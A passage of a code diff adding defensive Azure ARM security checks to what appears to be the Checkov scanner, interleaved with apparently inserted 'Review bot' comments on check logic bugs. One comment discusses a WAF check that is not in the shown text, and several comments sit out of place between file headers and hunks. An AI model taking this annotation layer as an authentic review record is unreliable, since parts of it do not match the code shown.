00000000000..a514d7983f7 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py 
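Review bot: In FrontDoorWAFACLCVE202144228 the rule-944240 branch treats `enabledState` as a boolean (`if not enabledState: return CheckResult.FAILED`), but in the Front Door WAF schema it is the string enum `Enabled`/`Disabled`, so an override that disables the rule with `"enabledState": "Disabled"` is truthy, survives the guard, and passes as soon as `action` is `Block` or `Redirect`; that is a false negative for exactly the case the check exists to catch. Comparing the string fixes it: `if str(enabledState).lower() == "disabled": return CheckResult.FAILED`. The first statement of the method also assigns `self.evaluatedKeys` (camelCase), which creates an unrelated attribute instead of initialising `self.evaluated_keys`, so the early FAILED returns report no evaluated keys; it should read `self.evaluated_keys = ["properties/managedRules"]`.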
@@ -0,0 +1,22 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class FunctionAppHttpVersionLatest(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that 'HTTP Version' is the latest, if used to run the Function app" + id = "CKV_AZURE_67" + supported_resources = ("Microsoft.Web/sites/slots", "Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/http20Enabled" + + +check = FunctionAppHttpVersionLatest() diff --git a/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py new file mode 100644 index 00000000000..cefe0dd5825 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py @@ -0,0 +1,26 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class FunctionAppMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure Function app is using the latest version of TLS encryption" + id = "CKV_AZURE_145" + supported_resources = ('Microsoft.Web/sites', 'Microsoft.Web/sites/slots',) + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/minTlsVersion" + + def get_expected_value(self) -> Any: + return 1.2 + + def get_expected_values(self) -> List[Any]: + return ["1.2", 1.2] + + +check = FunctionAppMinTLSVersion() 
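Review bot: FunctionAppMinTLSVersion (second hunk) accepts only `"1.2"`/`1.2` in `get_expected_values`, so a site that pins `properties/siteConfig/minTlsVersion` to `"1.3"` — which newer App Service API versions accept, as far as I know — would be reported FAILED although it is stricter than the baseline. If the schema in use allows it, returning `["1.2", 1.2, "1.3", 1.3]` avoids penalising the more secure setting; the same consideration applies to MSSQLServerMinTLSVersion later on this page. Also, `get_expected_value` returning the float `1.2` is unusual next to the string the ARM schema uses; a one-line comment stating that both spellings occur in templates would explain the dual list.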
diff --git a/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py b/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py new file mode 100644 index 00000000000..87e4a2cd84b --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py @@ -0,0 +1,45 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck + + +class FunctionAppsAccessibleOverHttps(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure that Function apps is only accessible over HTTPS" + id = "CKV_AZURE_70" + supported_resources = ( + "Microsoft.Web/sites/config", + "Microsoft.Web/sites", + "Microsoft.Web/sites/slots", + ) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + if "properties" in conf: + if self.entity_type == "Microsoft.Web/sites" or self.entity_type == "Microsoft.Web/sites/slots": + if "httpsOnly" not in conf["properties"]: + return CheckResult.FAILED + + https_only = conf["properties"]["httpsOnly"] + if not https_only: + return CheckResult.FAILED + + if "httpSettings" in conf["properties"]: + auth_settings_v2 = conf["properties"]["httpSettings"] + + # default=true for require_https + if 'requireHttps' not in auth_settings_v2: + return CheckResult.PASSED + + require_https = auth_settings_v2.get("requireHttps") + if not require_https: + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = FunctionAppsAccessibleOverHttps() diff --git a/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py new file mode 100644 index 00000000000..3c6656b3e84 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py 
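Review bot: In FunctionAppsAccessibleOverHttps a `Microsoft.Web/sites` resource with no `properties` block at all falls straight through to `return CheckResult.PASSED`, while the same resource with a `properties` block that merely omits `httpsOnly` is FAILED; since `httpsOnly` is unset in both cases the two should agree, so the outer `if "properties" in conf:` should return FAILED for the `sites`/`slots` entity types when properties are missing. The `httpSettings` branch reads `conf["properties"]["httpSettings"]` for every `Microsoft.Web/sites/config` resource without checking that `conf.get("name")` is `authsettingsV2`, unlike FunctionAppsEnableAuthentication on this page; a guard such as `if self.entity_type == "Microsoft.Web/sites/config" and conf.get("name") != "authsettingsV2": return CheckResult.UNKNOWN` would keep unrelated config resources out of the result. Note that `conf["properties"]` is indexed with `in` and `[]` without an `isinstance(..., dict)` check.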
@@ -0,0 +1,32 @@ +from __future__ import annotations + +from typing import Any + +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class FunctionAppsEnableAuthentication(BaseResourceCheck): + + def __init__(self) -> None: + name = "Ensure that function apps enables Authentication" + id = "CKV_AZURE_56" + supported_resources = ("Microsoft.Web/sites/config",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + if conf.get('name', '') != 'authsettingsV2': + return CheckResult.PASSED + + properties = conf.get('properties', {}) + if properties and isinstance(properties, dict): + platform = properties.get('platform', {}) + if platform and isinstance(properties, dict): + enabled = platform.get('enabled', False) + if enabled: + return CheckResult.PASSED + return CheckResult.FAILED + + +check = FunctionAppsEnableAuthentication() diff --git a/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py b/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py new file mode 100644 index 00000000000..75a46dd98f2 --- /dev/null +++ b/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py 
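Review bot: The inner guard in `scan_resource_conf` reads `if platform and isinstance(properties, dict):` — it re-tests `properties`, which was already confirmed to be a dict two lines above, instead of `platform`, so a non-dict `platform` value (for example an unresolved parameter string) reaches `platform.get(...)` and raises `AttributeError` instead of producing a result. The fix is `if platform and isinstance(platform, dict):`. Setting `self.evaluated_keys = ['properties/platform/enabled']` before the lookup would also make the report point at the decisive key, as the other new checks on this page do.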
@@ -0,0 +1,38 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from typing import Dict, Any + + +class KeyVaultDisablesPublicNetworkAccess(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Key Vault disables public network access" + id = "CKV_AZURE_189" + supported_resources = ("Microsoft.KeyVault/vaults",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "publicNetworkAccess" + + def get_expected_value(self) -> str: + return "disabled" + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties = conf.get("properties", {}) + if self.get_inspected_key() in properties: + conf_value = conf["properties"][self.get_inspected_key()] + # Docs are unclear, so supporting Disabled and disabled + if conf_value and conf_value.lower() == self.get_expected_value(): + return CheckResult.PASSED + + if properties and "networkAcls" in properties: + network_acls = conf["properties"]["networkAcls"] + if isinstance(network_acls, dict) and "ipRules" in network_acls: + ip_rules = network_acls["ipRules"] + ip_rules = ip_rules[0] if ip_rules and isinstance(ip_rules, list) else ip_rules + if ip_rules: + return CheckResult.PASSED + return CheckResult.FAILED + + +check = KeyVaultDisablesPublicNetworkAccess() diff --git a/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py b/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py new file mode 100644 index 00000000000..9cbaf05c790 --- /dev/null +++ b/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py 
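Review bot: The second branch of `scan_resource_conf` returns PASSED as soon as `networkAcls.ipRules` is non-empty, but a Key Vault whose `networkAcls.defaultAction` is `Allow` still accepts traffic from every public address regardless of its IP rules, so this branch passes vaults that are fully public; the IP-rule path should additionally require `network_acls.get("defaultAction") == "Deny"`, e.g. `if ip_rules and network_acls.get("defaultAction") == "Deny": return CheckResult.PASSED`. The `ip_rules = ip_rules[0] if ip_rules and isinstance(ip_rules, list) else ip_rules` line only inspects the first rule and its purpose is not obvious; a comment or a plain truthiness test on the list would be clearer. `conf_value.lower()` will also raise if `publicNetworkAccess` arrives as a non-string (e.g. a boolean); `str(conf_value).lower()` is safer.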
@@ -0,0 +1,22 @@ +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class KeyVaultEnablesPurgeProtection(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that key vault enables purge protection" + id = "CKV_AZURE_110" + supported_resources = ['Microsoft.KeyVault/vaults'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> Any: + return "properties/enablePurgeProtection" + + def get_expected_value(self) -> bool: + return True + + +check = KeyVaultEnablesPurgeProtection() diff --git a/checkov/arm/checks/resource/LinuxVMUsesSSH.py b/checkov/arm/checks/resource/LinuxVMUsesSSH.py new file mode 100644 index 00000000000..9cc03be99c2 --- /dev/null +++ b/checkov/arm/checks/resource/LinuxVMUsesSSH.py @@ -0,0 +1,24 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from typing import Any +from checkov.common.models.consts import ANY_VALUE + + +class LinuxVMUsesSSH(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure linux VM enables SSH with keys for secure communication" + id = "CKV_AZURE_178" + supported_resources = ("Microsoft.Compute/virtualMachines", "Microsoft.Compute/virtualMachineScaleSets") + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def get_inspected_key(self) -> str: + if self.entity_type == "Microsoft.Compute/virtualMachineScaleSets": + return "properties/virtualMachineProfile/osProfile/linuxConfiguration/ssh/publicKeys/[0]/path" + return "properties/osProfile/linuxConfiguration/ssh/publicKeys/[0]/path" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = LinuxVMUsesSSH() 
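Review bot: `categories = [CheckCategories.NETWORKING]` misclassifies purge protection, which is a deletion/retention safeguard rather than a network control; the sibling retention checks on this page (geo-redundant backup, zone redundancy) use `CheckCategories.BACKUP_AND_RECOVERY`, and this check should probably match. The `get_inspected_key` annotation `-> Any` is also looser than the `-> str` used by every other check in this series for the same method.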
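Review bot: The inspected key only proves that a public key path is listed under `ssh/publicKeys/[0]`, which does not establish key-only login: `linuxConfiguration/disablePasswordAuthentication` can still be false alongside a key and the check will pass. Either the name should be narrowed to what is verified, or a short comment should say so, e.g. `# presence of a key is checked; password authentication is not evaluated here`. Since only index `[0]` is read, a template that lists keys in a later position would also be a miss, which is worth documenting.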
diff --git a/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py new file mode 100644 index 00000000000..55669a57f29 --- /dev/null +++ b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py @@ -0,0 +1,24 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MSSQLServerMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure MSSQL is using the latest version of TLS encryption" + id = "CKV_AZURE_52" + supported_resources = ("Microsoft.Sql/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED,) + + def get_inspected_key(self) -> str: + return "properties/minimalTlsVersion" + + def get_expected_value(self) -> str: + return "1.2" + + +check = MSSQLServerMinTLSVersion() diff --git a/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py b/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py new file mode 100644 index 00000000000..87f98131687 --- /dev/null +++ b/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py 
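Review bot: `get_expected_value` pins the acceptable value to exactly `"1.2"`, so a template that selects a newer minimum (the name says "latest version") would fail rather than pass; StorageAccountsUseReplication in this same series overrides `get_expected_values` to accept a set, and the same pattern would let this check list every acceptable version. I cannot see whether the base comparison is exact-match, so this is a request to confirm and, if it is, to switch to the list form.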
@@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MariaDBGeoBackupEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that MariaDB server enables geo-redundant backups" + id = "CKV_AZURE_129" + supported_resources = ("Microsoft.DBforMariaDB/servers",) + categories = (CheckCategories.BACKUP_AND_RECOVERY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/storageProfile/geoRedundantBackup" + + def get_expected_value(self) -> str: + return "Enabled" + + +check = MariaDBGeoBackupEnabled() diff --git a/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py b/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py new file mode 100644 index 00000000000..5d095ac5adf --- /dev/null +++ b/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py @@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MariaDBPublicAccessDisabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure 'public network access enabled' is set to 'False' for MariaDB servers" + id = "CKV_AZURE_48" + supported_resources = ("Microsoft.DBforMariaDB/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/publicNetworkAccess" + + def get_expected_value(self) -> str: + return "Disabled" + + +check = MariaDBPublicAccessDisabled() diff --git a/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py new file mode 100644 index 00000000000..6336a41668a --- /dev/null 
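Review bot: MariaDBPublicAccessDisabled does not pass `missing_block_result=CheckResult.FAILED`, while PostgreSQLServerHasPublicAccessDisabled later in this commit does for the equivalent `properties/publicNetworkAccess` key; a template that omits the key leaves the service default in effect, and the two checks should agree on how that is reported. If the base class default already yields FAILED this is only a consistency nit, but making it explicit as in the PostgreSQL sibling documents the intent.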
+++ b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py @@ -0,0 +1,23 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MySQLPublicAccessDisabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure 'public network access enabled' is set to 'False' for mySQL servers" + id = "CKV_AZURE_53" + supported_resources = ("Microsoft.DBforMySQL/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/publicNetworkAccess" + + def get_expected_value(self) -> str: + """ + Returns the default expected value, governed by provider best practices + """ + return "disabled" + + +check = MySQLPublicAccessDisabled() diff --git a/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py new file mode 100644 index 00000000000..ddba3b1261d --- /dev/null +++ b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py @@ -0,0 +1,23 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MySQLServerMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure MySQL is using the latest version of TLS encryption" + id = "CKV_AZURE_54" + supported_resources = ("Microsoft.DBforMySQL/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, ) + + def get_inspected_key(self) -> str: + return "properties/minimalTlsVersion" + + def get_expected_value(self) -> str: + return "TLS1_2" + + +check = MySQLServerMinTLSVersion() 
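Review bot: `get_expected_value` returns `"disabled"` in lower case, while MariaDBPublicAccessDisabled and PostgreSQLServerHasPublicAccessDisabled in this commit return `"Disabled"`, which is also the casing the resource provider documents; unless the base class compares case-insensitively (not visible here), templates written with the documented casing will fail this check. The likely fix is `return "Disabled"`. The docstring "Returns the default expected value, governed by provider best practices" could then name the provider value it enforces.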
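Review bot: MySQLServerMinTLSVersion omits `missing_block_result=CheckResult.FAILED`, whereas MSSQLServerMinTLSVersion in the same commit sets it for the same `properties/minimalTlsVersion` key; a server with no minimum TLS version configured is the case this check exists for, so the two should behave the same way when the key is absent. Passing `missing_block_result=CheckResult.FAILED` in the `super().__init__` call (as the MSSQL sibling does) would align them.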
diff --git a/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py b/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py new file mode 100644 index 00000000000..12465811122 --- /dev/null +++ b/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class PostgreSQLServerHasPublicAccessDisabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that PostgreSQL server disables public network access" + id = "CKV_AZURE_68" + supported_resources = ('Microsoft.DBforPostgreSQL/servers',) + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED) + + def get_inspected_key(self) -> str: + return 'properties/publicNetworkAccess' + + def get_expected_value(self) -> str: + return "Disabled" + + +check = PostgreSQLServerHasPublicAccessDisabled() diff --git a/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py b/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py new file mode 100644 index 00000000000..603067a5653 --- /dev/null +++ b/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py 
@@ -0,0 +1,22 @@ +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class PostgressSQLGeoBackupEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that PostgreSQL server enables geo-redundant backups" + id = "CKV_AZURE_102" + supported_resources = ['Microsoft.DBforPostgreSQL/servers'] + categories = [CheckCategories.BACKUP_AND_RECOVERY] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> Any: + return 'properties/storageProfile/geoRedundantBackup' + + def get_expected_value(self) -> str: + return 'Enabled' + + +check = PostgressSQLGeoBackupEnabled() diff --git a/checkov/arm/checks/resource/PubsubSKUSLA.py b/checkov/arm/checks/resource/PubsubSKUSLA.py new file mode 100644 index 00000000000..3c2c9f8180d --- /dev/null +++ b/checkov/arm/checks/resource/PubsubSKUSLA.py @@ -0,0 +1,24 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck + + +class PubsubSKUSLA(BaseResourceNegativeValueCheck): + def __init__(self) -> None: + name = "Ensure Web PubSub uses a SKU with an SLA" + id = "CKV_AZURE_175" + supported_resources = ("Microsoft.SignalRService/webPubSub",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def get_inspected_key(self) -> str: + return "sku/name" + + def get_forbidden_values(self) -> Any: + return "Free_F1" + + +check = PubsubSKUSLA() diff --git a/checkov/arm/checks/resource/PubsubSpecifyIdentity.py b/checkov/arm/checks/resource/PubsubSpecifyIdentity.py new file mode 100644 index 00000000000..056fa4002a7 --- /dev/null 
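Review bot: The class and module are named `PostgressSQLGeoBackupEnabled` with a doubled "s", while the sibling added in this commit is `PostgreSQLServerHasPublicAccessDisabled`; the check id and name are fine, but the misspelled class name will be what shows up in imports and tracebacks. Renaming to `PostgreSQLGeoBackupEnabled` (file and class) before this lands avoids carrying the typo forward.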
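Review bot: `get_forbidden_values` in PubsubSKUSLA returns the bare string `"Free_F1"` rather than a list; if the base negative-value check tests membership with `in`, a string operand turns that into a substring test, and if it expects an iterable of values a single string is the wrong shape either way. `return ["Free_F1"]` matches what the method name and the `-> Any` annotation imply, and the annotation could then be tightened to `-> list[str]`.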
+++ b/checkov/arm/checks/resource/PubsubSpecifyIdentity.py @@ -0,0 +1,23 @@ +from typing import Any + +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories + + +class PubsubSpecifyIdentity(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure Web PubSub uses managed identities to access Azure resources" + id = "CKV_AZURE_176" + supported_resources = ["Microsoft.SignalRService/webPubSub"] + categories = [CheckCategories.IAM] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = PubsubSpecifyIdentity() diff --git a/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py b/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py new file mode 100644 index 00000000000..7d4aeaf648b --- /dev/null +++ b/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py 
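Review bot: `ANY_VALUE` on `identity/type` passes a resource whose identity type is explicitly `"None"`, which is a valid value for that field and means no managed identity is assigned, the exact case this check is meant to catch. The same commit adds PubsubSKUSLA on `BaseResourceNegativeValueCheck`; building this check the same way with `"None"` as the forbidden value, or listing the assigned identity kinds via `get_expected_values`, would close that gap. A comment noting that a missing `identity` block is handled by the base class's missing-block behaviour would also help.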
@@ -0,0 +1,43 @@ +from __future__ import annotations + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class SQLDatabaseZoneRedundant(BaseResourceValueCheck): + def __init__(self) -> None: + """ + This is a best practise which helps to: + - Improved High Availability: Zone redundancy ensures that your database is replicated + across Availability Zones within an Azure region. If one Availability Zone experiences an outage, + your database continues to operate from the other zones, minimizing downtime. + - Reduced Maintenance Downtime: Zone-redundant configurations often require + less planned maintenance downtime because updates and patches can be applied to + one zone at a time while the other zones continue to serve traffic. + - Improved Scalability: Zone-redundant configurations are designed to scale with your workload. + You can take advantage of features like Hyperscale to dynamically adjust resources based on + your database's performance needs. + - Improved SLA: Azure SQL Database zone-redundant configurations typically offer + a higher service-level agreement (SLA) for availability compared to non-zone-redundant configurations. + + However, it's critical to note that: + Note that: + - Zone-redundant availability is available to databases in the + General Purpose, Premium, Business Critical and Hyperscale service tiers of the vCore purchasing model, + and not the Basic and Standard service tiers of the DTU-based purchasing model. + - This may not be required for: + - Databases that supports applications which doesn't a high maturity in terms of "High Availability" + - Databases that are very sensitive to network latency that may increase the transaction commit time, + and thus impact the performance of some OLTP workloads. 
+ """ + name = "Ensure the Azure SQL Database Namespace is zone redundant" + id = "CKV_AZURE_229" + supported_resources = ["Microsoft.Sql/servers/databases",] + categories = [CheckCategories.BACKUP_AND_RECOVERY,] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/zoneRedundant" + + +check = SQLDatabaseZoneRedundant() diff --git a/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py b/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py index b67c9bbb857..45bfd1ef0b5 100644 --- a/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py +++ b/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py @@ -15,7 +15,7 @@ def __init__(self) -> None: :return: """ name = "Ensure Storage Account is using the latest version of TLS encryption" - id = "CKV_AZURE_236" + id = "CKV_AZURE_44" supported_resources = ('Microsoft.Storage/storageAccounts',) categories = (CheckCategories.NETWORKING,) diff --git a/checkov/arm/checks/resource/StorageAccountName.py b/checkov/arm/checks/resource/StorageAccountName.py new file mode 100644 index 00000000000..41b5bfd6f42 --- /dev/null +++ b/checkov/arm/checks/resource/StorageAccountName.py 
@@ -0,0 +1,48 @@ +from __future__ import annotations + +import re +import typing + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck + + +STO_NAME_REGEX = re.compile(r"^[a-z0-9]{3,24}$") +VARIABLE_REFS = ("local.", "module.", "var.", "random_string.", "random_id.", "random_integer.", "random_pet.", + "azurecaf_name", "each.") + + +class StorageAccountName(BaseResourceCheck): + def __init__(self) -> None: + """ + Initializes a check to ensure that Storage Accounts adhere to the naming rules. + + The naming reference for Storage Accounts can be found here: + https://docs.microsoft.com/en-us/azure/storage/common/storage-account-overview#naming-storage-accounts + """ + name = "Ensure Storage Accounts adhere to the naming rules" + id = "CKV_AZURE_43" + supported_resources = ['Microsoft.Storage/storageAccounts'] + categories = [CheckCategories.CONVENTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, typing.Any]) -> CheckResult: + """ + The Storage Account naming reference: + https://docs.microsoft.com/en-us/azure/storage/common/storage-account-overview#naming-storage-accounts + :param conf: azurerm_storage_account configuration + :return: + """ + if "name" in conf.keys(): + name = conf["name"] + if name: + name = str(name) + if any(x in name for x in VARIABLE_REFS): + # in the case we couldn't evaluate the name, just ignore + return CheckResult.UNKNOWN + if re.findall(STO_NAME_REGEX, name): + return CheckResult.PASSED + return CheckResult.FAILED + + +check = StorageAccountName() diff --git a/checkov/arm/checks/resource/StorageAccountsUseReplication.py b/checkov/arm/checks/resource/StorageAccountsUseReplication.py new file mode 100644 index 00000000000..86b0de0d9bd --- /dev/null +++ b/checkov/arm/checks/resource/StorageAccountsUseReplication.py 
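Review bot: `VARIABLE_REFS` holds Terraform reference prefixes (`local.`, `var.`, `module.`, `each.`) that never occur in an ARM template, while ARM's own dynamic names are expressions such as `[parameters('...')]` or `[concat(...)]`; those contain `[`, `(` and quotes, fail `STO_NAME_REGEX`, and are reported as FAILED instead of UNKNOWN. A guard like `if name.startswith("["): return CheckResult.UNKNOWN` covers the ARM case, and the Terraform list can then go. The docstring's `:param conf: azurerm_storage_account configuration` is also carried over from the Terraform check and should name the `Microsoft.Storage/storageAccounts` resource; and `STO_NAME_REGEX.match(name)` is the idiomatic form of `re.findall(STO_NAME_REGEX, name)` for an anchored pattern.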
@@ -0,0 +1,24 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from typing import Any, List + + +class StorageAccountsUseReplication(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Storage Accounts use replication" + id = "CKV_AZURE_206" + supported_resources = ("Microsoft.Storage/storageAccounts",) + categories = (CheckCategories.BACKUP_AND_RECOVERY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def get_inspected_key(self) -> str: + return "sku/name" + + def get_expected_value(self) -> Any: + return "Standard_GRS" + + def get_expected_values(self) -> List[Any]: + return ["Standard_GRS", "Standard_RAGRS", "Standard_GZRS", "Standard_RAGZRS"] + + +check = StorageAccountsUseReplication() diff --git a/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py new file mode 100644 index 00000000000..cca500a26dd --- /dev/null +++ b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class NetworkInterfaceEnableIPForwarding(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure File Sync disables public network access" + id = "CKV_AZURE_64" + supported_resources = ('Microsoft.StorageSync/storageSyncServices',) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED) + + def get_inspected_key(self) -> str: + return 'properties/incomingTrafficPolicy' + + def get_expected_value(self) -> str: + return 'AllowVirtualNetworksOnly' + + +check = NetworkInterfaceEnableIPForwarding() 
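Review bot: The class in StorageSyncPublicAccessDisabled.py is named `NetworkInterfaceEnableIPForwarding`, which is a copy-paste leftover unrelated to Azure File Sync; the `check = NetworkInterfaceEnableIPForwarding()` line inherits the same name. Beyond readability, if another module in the same checks package defines a class with that name (I cannot see the rest of the package), registry listings and tracebacks become ambiguous. Rename both occurrences to `StorageSyncPublicAccessDisabled` to match the file and the check id.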
